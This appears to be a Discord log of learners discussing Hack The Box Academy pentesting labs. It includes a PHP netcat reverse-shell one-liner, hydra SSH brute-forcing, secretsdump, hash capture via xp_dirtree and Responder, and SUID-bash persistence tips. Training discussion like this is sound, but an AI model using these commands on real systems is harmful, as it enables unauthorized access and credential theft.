sure shoot me a dm if y'all still need help with that
On the Citrix Breakout Win Priv Escalation module, I’m a little unsure on where to run smbserver.py from. On the module it’s being run from root@ubuntu but I’m pretty sure it needs to be from the initial target box. I’ve transferred it over to the initial Linux box and it still doesn’t appear to be working. I think the answer is probably in front of me but I can’t see it yet
Anyone able to nudge me please?
for the manual way you'll need to give us more than that for anyone to be able to help you like what did you try what work or didn't (say you started a php server and do exactly what the section show isn't really a good question) and for the automated tool at least give us what command did you use
yep you run the smbserver on the given linux machine
sudo /home/htb-student/.local/bin/smbserver.py -smb2support share /home/htb-student/Tools
Ahh I didn’t know it was in that folder! You’re a star, thank you ❤️
The hint is in the screen where it was in Tools folder if you look at the prompt
Totally missed that 🤦♂️ thanks!
I think that has a problem, I spent two days on this.
tldr; keep going, reset your box if necessary and you'll win the race condition once. Also use permanent privesc like || chmod +s /bin/bash || or || copying /etc/passwd, cat /root/flag.txt into a file etc || instead of revshell because the revshell won't last long
yeah,I solved it,I will finish the cpts
if you need help,please dm me
I already have the CPTS certification but thanks 🙂 I'm revisiting old modules that got updated
LOGIN BRUTE FORCING --> Service Authentication Brute Forcing -->Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?
I've brute forced the second account (m.gates)but i cant get the first one (b.gates) cracked.
cmd b.gates ||hydra -l b.gates -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ssh://94.237.53.115:52965||
cmd m.gates ||hydra -l m.gates -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ssh://94.237.53.115:52965||
What did i miss?
XDDDDDDD
Can't remember this one but the wordlist you're using is only the top 10 password, which might be a little light
Think i've misunderstood that i should use the short rock-you.txt and should be using a different method learned earlier in the module?
I think something new will be released soon 🤩
@silver mesa
Will be curious to see how that cert compares to the BTL1 cert
For this section you are supposed to use a custom wordlist like they had you create in the Personalized Wordlist section.
Yeah that makes sense, my apologies. I often find it difficult to strike the balance between giving enough for people to help me but not so much that it spoils anything for others. Sounds like I was way too tight-lipped this time. I just went through the exercise again and am getting a different error this time. I first intercepted a POST request to http://<TARGET_IP>/blind (filled out the form on the site and intercepted the post request with burp), deleted all code underneath <?xml version="1.0" encoding="UTF-8"?> and replaced the deleted code with XXEINJECT, copied the request and wrote it to a file called req.txt, then ran the following command: ruby XXEinjector.rb --host=127.0.0.1 --httpport=8000 --file=req.txt --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter I get the message "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive."
This is the first time I saw a bunny CPTS certified.
Blue Teamers 🙌
I recommend you watch ippsec’s video on “book”, the logrotten exploit is used there
To you too
Hello guys, i'm in the PIVOTING module, with the ICMP TUNNELING WITH SOCKS task
someone knows how i fix this error?
Did you think critically before you ran this?
doing "Password attacks - Passwd, Shadow & Opasswd" I've been waiting for the unshadowed hash to crack for several minutes
yeah
what about it
pressed enter way too soon sorry about that
its oki mate
I found the back ups for the shadow and passwd file and I ran the unshadow command and I've been trying to crack that with hashcat
but it's taking forever
am I doing something wrong or I need to wait?
which wordlist you are using
if you want to dm i can try to help
rockyou.txt
that was it, thanks
i'm in the pvt box
welcome anytime
Just have the same issue as @smoky viper , did use secretsdump but still have the same NT hash for all users, which when cracked gives an empty password 😢
The error is because it cant find the shared object. Recompile except statically
yes
hmmmm, i followed the modules steps, i'll try with another way
what cmnd u used
You dont need to try another way. you just need to statically compile the tool first
can you paste the command used?
not the whole output just the command
||impacket-secretsdump -sam ./SAM -system ./SYSTEM LOCAL||
Just the normal one ^^
done from pwnbox
going to dm you
A reminder the NTLM is LM:NT if LM is not used the first part it's empty "aad3c435b514a4eeaad3b935b51304f "
impacket is weird and often really wants you to put the : in front too
can i DM?
so much that Im tempted to make my own patch just to not
no thanks Im at work. you can ask follow up questions here
I think most of them are using only the first part of the hash "aad3c435b514a4eeaad3b935b51304f " 😅
? Im not disagreeing
Would you have the command there, please?
why not instead google how to compile statically for the language of the tool and learn something new and useful instead?
o
I asked here because I didn't understand the reason, I hadn't done it yet, but thanks for the help, I'm looking here
hello- so i wonder can you do CTF questions solo
Well Ive given you the vital clue you need to discover how to solve the issue, so now its on you.
This wont be the only time you see an error like this. youre going to have to learn how.
so just a question: im trying to join a team but it doesnt exist while it does exist
i’m assuming you’re talking on the main platform?
read #welcome and verify your account. then either go to #1024429874246590575 or use the support feature on the website
beat me to it
wait ctf and hackthebox dont have the same teams?
this channel is for academy module discussion only
no
oh sorry
edit: I think I found something, hint: enumerate more :) hey I'm currently trying the knowledge check for getting started, I know of the way to gain one that includes msfconsole, but I would like to find another. I thought I found one but the script errors out, any pointers/tips?
I'm looking for a small hint regarding the skill assessment in Whitebox Pentesting 101. I believe my payload should work but I can't quite wrap my head around why it doesn't.
@pine dagger : I see you finished the module. Would you be open to a DM? 🙂
ok so I managed to get to the admin console, but file upload doesn't function, can anyone provide a tiny hint?
(@Coy I'd love to help but I haven't done that box sorry 😦 )
The box went offline as soon as I did that, so gonna retry and upgrade it
what box is that
getting started knowledge check
if you follow the same steps as that module you should be able to complete that box
I had to get a liiiiiittle more creative with how to transfer the shellcode to the webserver but I ended up finding a spot for it :)
Have a tty shell running as we speak :D
awesome
in hindsight, I should have enumerated the admin panel more
why is this command not giving me back any result
did you think critically before running this command?
Hi! What is the password for the "mssqlsvc" user? i know its done with Responder
IN the Attacking Common Services/SQL
but i cant capture anything
can somebody give a hint?
XD! im done for today wasnt even giving a fk about subnetworks
i just had to check at subdomains
not IPs
I was meming but glad you figured it out anyways
would help if you actually provided the commands you tried
i ran responder: sudo responder -I tun0
sqsh -S 10.129.203.12 -U htbdbuser -P 'MSSQLAccess01!' -h
im just in a hurry and want to end these questions :S
1> EXEC master..xp_dirtree ' \10.129.203.12\share\ '
2> GO
thats not enough slashes
also you provided the same IP as the target?
Did you think critically before you ran this?
unc paths always start with double \ in windows
helpful to always use code blocks when sending commands - 1> EXEC master..xp_dirtree '\\10.129.203.12\\share\ '
?
Your command is reaching the same server you connected to in your sqsh command
how do you expect responder to see it?
you need to specify the share as being on your box
i tried it with my ip too
did you try the other suggested sql command too?
isn't there supposed to be output after you execute the go line...?
reset the target, or this
just for verification
i need to run responder, i need to run smb server on my end, and i need to execute those commands in mssql
this is the concept right?
you don't need Responder AND an SMB Server
choose one
"To make this work, we need first to start Responder or impacket-smbserver and execute one of the following SQL queries:"
then i dont understand
Responder and the SMB server will both catch the hash and print it to the terminal
your smb server is likely directly blocking responder from working lmao
i restarted everything
i ran impacket-smbserver
commands still not working
i dont consider myself stupid but this section of the module seem a bit unexplained
at least to me
It literally says so in the section, I just checked
this is right from the module... it says "or" not and or both.
To make this work, we need first to start responder OR impacket-smbserver
I’m not stuck lol
I know
Im saying I dont care that the section says you can use either. I wanna see his results using responder
and only responder
ok so i restarted everything
i only ran one thing at a time
now i started responder
sudo responder -I tun0
id also recommend connecting with mssqlclient over sqsh simply because sqsh seems to never work for me

i am doing it now
if responder with mssqlclient doesnt work then youve got some funky firewall stuff going on and Id say just use the pwnbox to get it over with
I'm now doing "Protected Archives" from the "PASSWORD ATTACKS " module and after using zip2john and running john I can't get the password
don't use rockyou.txt for the Password Attacks module, use the wordlist provided
damn, same mistake again
I have a doubt with the using crackmapexec module
I don't understand the question xd
of the smb modules, which one starts with zero
Hello! I'm on 'Credentialed Enumeration - from Linux' of the AD enum & attacks module.
I'm trying to run bloodhound-python from my kali through proxychains instead of the parrot target for practice
Problem is DNS seem to not work through proxychains (nmap 172.16.5.5 works fine)
└─$ proxychains bloodhound-python -u forend -p Klmcargo2 -ns 172.16.5.5 -d inlanefreight.local
...
dns.resolver.LifetimeTimeout: The resolution lifetime expired after 3.223 seconds: Server Do53:172.16.5.5@53 answered The DNS operation timed out.; Server Do53:172.16.5.5@53 answered The DNS operation timed out.
I tried adding inlanefreight.local to /etc/hosts, seems it's not enough
└─$ proxychains bloodhound-python -u forend -p Klmcargo2 -dc inlanefreight.local -d inlanefreight.local
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.5:88 ... OK
INFO: Connecting to LDAP server: inlanefreight.local
...
raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: inlanefreight.local.
...
Any ideas how to get it to work with proxychains?
I have none with zero
nvm
I was grepping for 0 lol
it works with ligolo-ng (of course...)
still, if anyone knows the solution with proxychains please tell!
hi I'm having trouble with the last section of Intro to Nmap module. I did all of these UDP scans, stealth scans, etc. and it does nothing. I am lost on where to begin and the hint seems vague. I looked up services that require a lot of data but there are a bunch of them.
I think if someone could help me get started in the right direction that would be great. Like if someone could tell me what I should research.
hint: scan all the tcp ports
😉
Im using john to crack an ssh in the Password cracking module - medium lab and cant seem to get the hash cracked.
I have ssh2john and have ssh.hash and have used fasttrack, rockyou, the resource password.list and a mutated list with no luck. Any ideas
ok doing that again right now. thank you
lemme check my notes
I need to take more notes
<@&861185840277487616>
cann u dm me
and tell me
what u did
4n0nx (881081150188183573) has been banned until 2023-10-26 20:35:11 (UTC).
DM sent
ty
I'm doing TCP scans but regular TCP scan and stealth scan aren't working. I am doing Xmas scans and Fin and Null scans. These show many opened | filtered ports but it doesn't say what the ports are.
this is for last section of nmap module
Idle scans I'm having a hard time with because I need a proxy
which I don't have
YouTubing Idle scans right now
idle scan won't work I guess
why isn't my Xmas or fin or null scans working in Nmap? It says there are lots of open | filtered ports but it doesn't say what the ports are. This is for Hack the Box Academy's last section of Intro to Nmap module.
[us-academy-1]─[10.10.15.183]─[htb-ac-605555@htb-jtsttncadw]─[~]
└──╼ [★]$ sudo nmap -sX -T4 -v 10.129.246.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-26 21:49 BST
Initiating Ping Scan at 21:49
Scanning 10.129.246.7 [4 ports]
Completed Ping Scan at 21:49, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:49
Completed Parallel DNS resolution of 1 host. at 21:49, 0.00s elapsed
Initiating XMAS Scan at 21:49
Scanning 10.129.246.7 [1000 ports]
Completed XMAS Scan at 21:49, 1.47s elapsed (1000 total ports)
Nmap scan report for 10.129.246.7
Host is up (0.0026s latency).
All 1000 scanned ports on 10.129.246.7 are in ignored states.
Not shown: 869 closed tcp ports (reset), 131 open|filtered tcp ports (no-response)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds
Raw packets sent: 1135 (45.392KB) | Rcvd: 870 (34.788KB)
Open | filtered ports aren't showing up.
I mean it says that are there but they aren't displayed
XMAS scans are old and outdated
theres virtually never a reason to use them as its nots the 90s
ok but I tried idle scans except I have no proxy to use
what proxy am I supposed to use?
doesn't it have to be an actual device?
I don't think I can just make something up
do I pretend to be a device on the machine's network?
ok but the only other thing I can think of is an idle scan at this point which I have had trouble implementing without a proxy
wow shocker, who would have thought 😄
Struggling with Attacking DNS exercise (from Attacking common services module) 😡 🤣
not idle scan either
next thing to try ; suicide 🤣 😢
Ok someone said to reread previous three sections so I’m gonna do that and try to let it sink in.
Maybe I am missing something
good advice
hello guys im on pivoting tunneling and port forwarding
┌──(shadowalker㉿kali)-[~/rpivot]
└─$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
New connection from host 10.129.155.115, source port 44010
Got command to close relay. Closing connection with client.
New connection from host 10.129.155.115, source port 44132
Socket error on sending command to remote side. Code 32. Msg Broken pipe
New connection from host 10.129.155.115, source port 44172
ubuntu@WEB01:/tmp/rpivot$ python2.7 client.py --server-ip 10.10.14.33 --server-port 9999
Backconnecting to server 10.10.14.33 port 9999
Backconnecting to server 10.10.14.33 port 9999
Unable to connect to 10.10.14.33 port: 9999. Caught socket error trying to establish connection with RPIVOT server. Code 111. Msg Connection refused
Retrying
Unable to connect to 10.10.14.33 port: 9999. Caught socket error trying to establish connection with RPIVOT server. Code 111. Msg Connection refused
Retrying
Unable to connect to 10.10.14.33 port: 9999. Caught socket error trying to establish connection with RPIVOT server. Code 111. Msg Connection refused
i tried this to perform nmap scan with tcp connect to look for all the host on the target
[10:41 PM]
└─$ proxychains nmap -sT 172.16.4.0/23 -p 80
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org/ ) at 2023-09-26 16:36 CDT
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.0:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.4.2:80 <--socket error or timeout!
[10:42 PM]
└─$ tail -4 /etc/proxychains4.conf
meanwile
defaults set to "tor"
socks4 127.0.0.1 9050
[10:43 PM]
as soon as i started the scan it giving me errors
i hope some one can help me to find a solution
for this
Hi! Guys!
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Performed dig on all subdomains (dig any @white rock subdomains) ,Used subbrute on inlanefreight.htb but it just hangs does not do anything...
Please put your long block of text/code in triple backticks (```)
Where do I go for that kind of help?
how i tried it its not working
Put them a line above and below
Also not in parenthesis
It looks like you tried using quotes not backticks
` not '
The police, and don't send things to random strangers in the future
I did they said they can’t help
```
It will look like this (I escaped the first backtick to show you
```
do you know why its not working
like the cmnd
Did you follow the steps properly
yeah
Recheck to make sure
i did but ill try one more
Yes
oh thx
hi. I am on the Pivoting, Tunneling, and Port Forwarding Skills Assessment. I submitted the ip address for the host that I found from a ping sweep but it says its wrong. When I ping sweep that is the only one I am getting. I tried nmap and a one liner. Can I post the command for the ping sweep, or am I missing something?
you can dm if you want
sweet thanks
need some help with this
section
my command gave me nothing. I'm using Dsquery and LDAP to form the command
got it
Hi all. A bit stuck on Nibbles regarding the "Initial Foothold".
I've tried searching this channel for what im looking for but gave up after a bit ha.
I am using pwnbox, but having an issue getting the netcat listener to spawn the shell on the target.
I believe it is an issue with the ATTACKER IP im using. The walkthrough says use the tun0, however, im not getting a response back from that.
I know im overlooking something.
Heres the php code for the reverse shell that I uploaded to images
<?php system(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.58 1234 >/tmp/f”); ?>
Once i've uploaded I start the listener, and then curl the URI, and thats where im getting stuck and netcat is just listening
I've tried the metasploit route, however it says that image.php needs to be deleted manually and could not for the life of me figure that. I made sure all options were properly set etc
ig u need to ask about this here @boxes channel
i mean its a htb academy module
I reckon. I figured since there was other Nibbles chatter in here it would be a good place. I'll ask other channels.
Wait- no i think this is a good space to ask this question. It's a fundamental error im over looking and needing some support.
still stuck ?
yes ma men
were you able you login via ssh ?
i want to use the rpivot method to do tcp connect with nmap through proxychains to get the ip address of the web
application
Web Server Pivoting with Rpivot
that's the name of the module, and the module has section, what section are you stuck at ?
which one are you stuck at ?
Web Server Pivoting with Rpivot question
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
got it got it
ok look in general HTB never tells you to follow a specific way or use a specific tool, it only showcases a certain method or a certain way, and it's up to you to use it or not
of course it's always easier to use the presented way or explanation, and most likely it will work but sometimes that's not the case
i just want to know can i use this rpivot to do nmap scan
on the internal network
it feel like i can
but i dont know its not working
the easy way to do this task is just to login via ssh with -D < PIVOT PORT> then from your machine use proxychains nmap <IP>
now you could just proxychains firefox found_ip:80 but be sure if firefox is open to close it, then use pchains
can i dm you
sure
guys, for you usually how long subbrute runs on average?
i feel like it doesnt work
I mean if you supply the right lists it works well within a few minutes
At least in academy
Because it's not in /etc/hosts lol
.htb isn't a valid tld, so you need to tell your computer how to resolve it



